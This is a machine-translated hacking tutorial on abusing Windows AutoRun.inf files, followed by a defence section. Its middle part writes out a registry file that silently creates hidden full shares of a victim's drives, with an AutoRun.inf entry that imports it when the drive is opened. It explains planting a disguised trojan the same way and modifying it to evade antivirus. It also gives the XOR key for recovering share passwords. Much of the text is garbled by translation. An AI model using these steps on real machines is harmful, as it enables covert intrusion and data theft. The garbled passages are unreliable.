Autorun. inf attack Theory

Recently, AutoRun. the inf file enables all the hard disks of the other party to be fully shared or the Trojan. the Application of inf files in hacking technology is still rare, and there are not many related materials. Many people think this is mysterious. This article attempts to solve this problem for you, so that you can fully understand this not complex but extremely interesting technology.
1. Theoretical Basis:
Friends who often use CDs know that many CDs run automatically when they are put into the optical drive. How do they do this? The CD will be automatically executed when it is put into the optical drive, mainly relying on two files, one is the AutoRun. inf file on the CD, and the other is one of the system files of the operating system itself, cdsealing. vxd. Cdsealing. vxd will detect whether there is any action in the optical drive at any time. If so, you can find the AutoRun. inf file under the root directory of the optical drive. If the AutoRun. inf file exists, execute the preset program in it.
AutoRun. inf not only allows the CD to run programs automatically, but also allows the hard disk to run programs automatically. The method is very simple. Open notepad, right-click the file, and select "RENAME" in the pop-up menu ", rename it AutoRun. inf, in AutoRun. type the following content in inf:
[AutoRun] // indicates that the AutoRun part starts and must be entered
Icon = C:/C. ico // a personalized drive letter Icon for drive C. ico
Open = C:/1.exe // specifies the region and name of the program. Here, 1.exe is under the C drive.
Hosts file!
The "[AutoRun]" line must be in a fixed format. The "Icon" line corresponds to the Icon file, "C:/C. ico "is the icon file path and file name. You can change it to the path and file name of your image file when entering it. In addition, ". ico is the extension of the icon file. If you do not have such files on hand, you can use ACDSee to convert the software in other formats to the ico format, or find a file with the suffix BMP, rename it to the ICO file.
The "Open" line specifies the file to be automatically run and its drive letter and path. Note that if the hard disk and directory you want to change do not have an automatic playback file, you should delete the "OPEN" line, otherwise, the hard disk cannot be opened because the automatic playback file cannot be found. You can only right-click the drive letter and select "open" in the pop-up menu.
Note: The saved file name must be "AutoRun. inf". The prepared Autorun. inf file and icon file must be placed in the root directory of the hard disk. Furthermore, if the content of a hard disk is relatively fixed for the time being, you may wish to use Flash to make an automatic playback file and then compile the "Autorun" file, then you have the coolest and most personalized hard drive.
It's not over yet. As you know, after some CDs are placed, right-click the icon and a special directory menu will be generated, if you can right-click on our hard drive to produce this effect, it will be more distinctive. In fact, the CD can achieve this simply because there are two statements in the AutoRun. inf file:

Shell/flag = right-click the content in the displayed menu
Shell/flag/command = file to be executed or command line
Therefore, add the preceding statement to the AutoRun. inf file to the directory menu with special features of the hard disk, for example:
Shell/1 = days old
Shell/1/command/= notepad OK .txt
Hosts file. Note: The "Upload example" file is in the root directory of the hard disk. notepad is the built-in notepad program. If the file to be executed is a direct executable program, add the name of the executable program directly after "command.

Ii. Instances

The following is an example: if you scan to a machine with 139 shared, and the other machine only shares the D disk, we want to share all the drives of the other machine. First, edit a registry file, open notepad, and type the following content:

REGEDIT4
'A row must be empty.
[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Network/Lanman/C $]
"Path" = "C ://"
"Remark" = ""
"Type" = dword: 00000000
"Flags" = dword: 00000302
"Parmlenc" = hex:
"Parm2enc" = hex:

[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Network/Lanman/D $]
"Path" = "D ://"
"Remark" = ""
"Type" = dword: 00000000
"Flags" = dword: 00000302
"Parmlenc" = hex:
"Parm2enc" = hex:

[HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Network/Lanman/C $]
"Path" = "E ://"
"Remark" = ""
"Type" = dword: 00000000
"Flags" = dword: 00000302
"Parmlenc" = hex:
"Parm2enc" = hex:

I only set the above to the E drive. If the other side has many logical drive letters, set them on your own. Save the preceding part as the Share. reg file for backup. Note that REGEDIT4 is written in upper case and top case. Leave the last row empty and press the Enter key once in the last row.

Open notepad, compile an AutoRun. inf file, and enter the following content:

[AutoRun]
Open = regedit/s Share. reg // Add the/s parameter to ensure that no information is displayed during import.

Save the AutoRun. inf file. Add Share. reg and AutoRun. inf these two files are copied to the root directory of the d disk of the other party, so that the other party only needs to double-click the D disk to Share. reg import the registry, so that all the drives will be fully shared after the other computer restarts.

If you want to have a Trojan horse in the Peer, you only need. in the inf file, set "Open = Share. reg "is changed to" Open = Trojan Server File Name ", and then AutoRun. inf and the configured Trojan server are copied to the root directory of the d drive of the other party, so that the other party does not need to run the Trojan server program, but simply double-click the D drive to run the Trojan! The advantage of doing so is obvious, that is, greatly increasing the initiative of Trojan running! Note: Many people are very vigilant now. unfamiliar files won't run easily, and this method is hard to prevent.

It should be noted that the people who give you a trojan won't be so stupid not to disguise the Trojan. Generally, they will change the name of the Trojan server file, or nice or very similar to the system file name, and then change the trojan icon to make it look like a TXT file, ZIP file, or image file ,, finally, modify the Trojan's resource file so that it is not recognized by anti-virus software (the specific method can be seen in previous articles in this article). When the server users believe it, the trojan quietly intrude into the system. In fact, it is not difficult to understand from another angle-if you give someone a Trojan, I think you will do the same. The above methods are supplemented by the AutoRun. inf file in the above content!

Iii. Defense methods

The shared category is completely determined by the flags flag, and its key value determines the type of the shared directory. When flags = 0x302, restart the system and the Directory sharing flag disappears. On the surface, the directory is not shared. In fact, the directory is completely shared. The popular Internet shared worms use this feature. If you change "Flags" = dword: 00000302 to "Flags" = dword: 00000402, you can see that the hard disk is shared. Do you understand? The secret is here!

In the preceding code, the Parmlenc and Parm2enc attributes are encrypted passwords. The system uses an 8-bit password to perform an exclusive or operation with "35 9a 4b a6 53 a9 d4 6a, to find the password, perform an exclusive or operation again, and then query the ASCII table to obtain the directory password. One software in the network software uses this property to crack the network password. The Shared Password of another computer can be seen from one machine in the LAN.

The Nethacker Ⅱ software designed by TCP/IP protocol can pass through the Internet network, find the shared host, and then perform corresponding operations. Therefore, when you use Modem to access the Internet, be careful because your host will be fully shared with the other party.

The solution is to delete C $, d $, and E $ under HKEY_LOCAL_MACHINE/software/Microsoft/Windows/CurrentVersion/Network/LANMAN. Delete the vserver under Windows/system. vxD deletion: The virtual device driver is shared between files on the Microsoft Network and printers, and the vserver key values under HKEY_LOCAL_MACHINE/system/CurrentControlSet/services/VxD/are deleted, it will be safe.

In addition, disabling the hard disk Autorun function is also an effective way to prevent hacker intrusion. Enter Regedit in "run" in the "Start" menu, open the Registry Editor, and expand to the HKEY_CURRENT_USER/software/Microsoft/Windows/CurrentVersion/policies/exploer primary key, find "NoDriveTypeAutoRun" in the right pane, which determines whether to execute the CDROM or hard disk Autorun function.

Double-click "NoDriveTypeAutoRun". By default (that is, you have not disabled the autorun function), the default key value of "NoDriveTypeAutoRun" is, (Figure 2 ). The first value "95" is a hexadecimal value, which is the sum of all devices that are disabled to run automatically. Converting "95" to binary is 10010101. Each of them represents a device. Different devices in windows are represented by the following values:

The device name. The device name must contain the following values:
Dkive_unknown 0 1 01 H unrecognizable device type
Drive_no_root_dir 1 0 02 h drive without the root directory (drive without root directory)
Drive_removable 2 1 04 H removable drive (removable drive)
Drive_fixed 3 0 08 h fixed drive (fixed drive)
Drive_remote 4 1 10 h network drive)
Drive_cdrom 5 0 20 h optical drive (CD-ROM)
Drive_ramdisk 6 0 40 h RAM disk (RAM disk)
Keep drive types not specified for 7 1 80 h (not yet specified drive disk)

The value 0 in the table listed above indicates that the device is running, and the value 1 indicates that the device is not running (by default, windows prohibits the automatic operation of devices such as 80 h, 10 h, 4 h, and 01h. The value accumulation is exactly 95 h in hexadecimal format, so NoDriveTypeAutoRun "has a default key value of, 00, (00 ).

From the above analysis, it is not difficult to see that by default, the four Reserved devices that will automatically run are DRIVE_NO_ROOT_DIR, DRIVE_FIXED, DRIVE_CDROM, and DRIVE_RAMDISK. Therefore, you must disable the automatic running of AutoRun on the hard disk. in the inf file, the value of DRIVE_FIXED must be set to 1, because DRIVE_FIXED represents a fixed drive, that is, a hard disk. In this way, the original 10010101 (from bottom to top in the "value" column of the table) is changed to the binary 10011101, And the hexadecimal format is 9D. Now, change the "NoDriveTypeAutoRun" key value to 9D, 00, and then close the registry editor. After the computer is restarted, the AutoRun function of the hard disk will be disabled.
If you understand, you must know how to disable the optical disc AutoRun function! It is to set DRIVE_CDROM to 1, so that the first value in the "NoDriveTypeAutoRun" key value is 10110101, that is, the hexadecimal B5. Change the first value to B5 and disable the Registry Editor. After the computer is restarted, the Autorun function of CDROM is disabled. If you only want to disable the AutoRun function of the software disc, but retain the automatic playback capability of the CD audio disc, you only need to change the "NoDriveTypeAutoRun" key value to: BD, 00.
If you want to restore the AutoRun function of the hard drive or optical drive, perform a reverse operation.
In fact, AutoRun is not required in the root directory of most hard disks. inf file to run the program, so we can completely disable the AutoRun function of the hard disk, even if there is AutoRun under the root directory of the hard disk. windows does not run the specified program to prevent hackers from using AutoRun. inf file intrusion.
In addition, we should also enable Windows to display hidden shares. As we all know, when sharing is set in Windows 9X, you can hide the sharing by adding the "$" symbol after the sharing name. For example, if you want to share a C drive of a computer named share, you only need to set its sharing name to C $. In this way, we will not be able to see the shared drive C. We can only access the shared drive by entering the exact path of the shared drive. However, we only need to slightly modify the msnp32.dll file on the computer. This allows Windows to display hidden shares.
Because msnp32.dll is called in windows and cannot be modified directly, we need to copy msnp32.dll to drive C and change it to msnp32. msnp32.dll is in C: in the/Windows/system folder. Run the ultraedit and other hexadecimal file editors to open msnp32 and find "24 56 E8 17" (in the offset address 00003190 ~ 000031a0), find it, change "24" to "00", save it, and disable ultraedit. Restart the computer to enter the DOS mode, enter copy C:/msnp32.dll C:/Windows/system/msnp32.dll at the command prompt, and restart the computer to enter windows, double-click share to view the hidden share.
Finally, we would like to remind you that the hacker software, such as nethacker ⅱ, designed using the TCP/IP protocol, can pass through the Internet, find the shared host, and then perform relevant operations. Therefore, when you use modem to access the Internet, be careful because your host will be fully shared with the other party. The solution to prevent such incidents is to constantly check the system, patch the system, and often use anti-Black antivirus software. when accessing the internet, open the firewall, pay attention to exceptions, and pay attention to Autorun. INF file content, disable sharing or do not set to full sharing, and add a complex shared password.
Disclaimer: The purpose of this article is to enable everyone to clearly understand the popular hacking methods on the Internet and enhance their protection awareness. Therefore, please do not use this article to do illegal things. Remember: do not do what you want!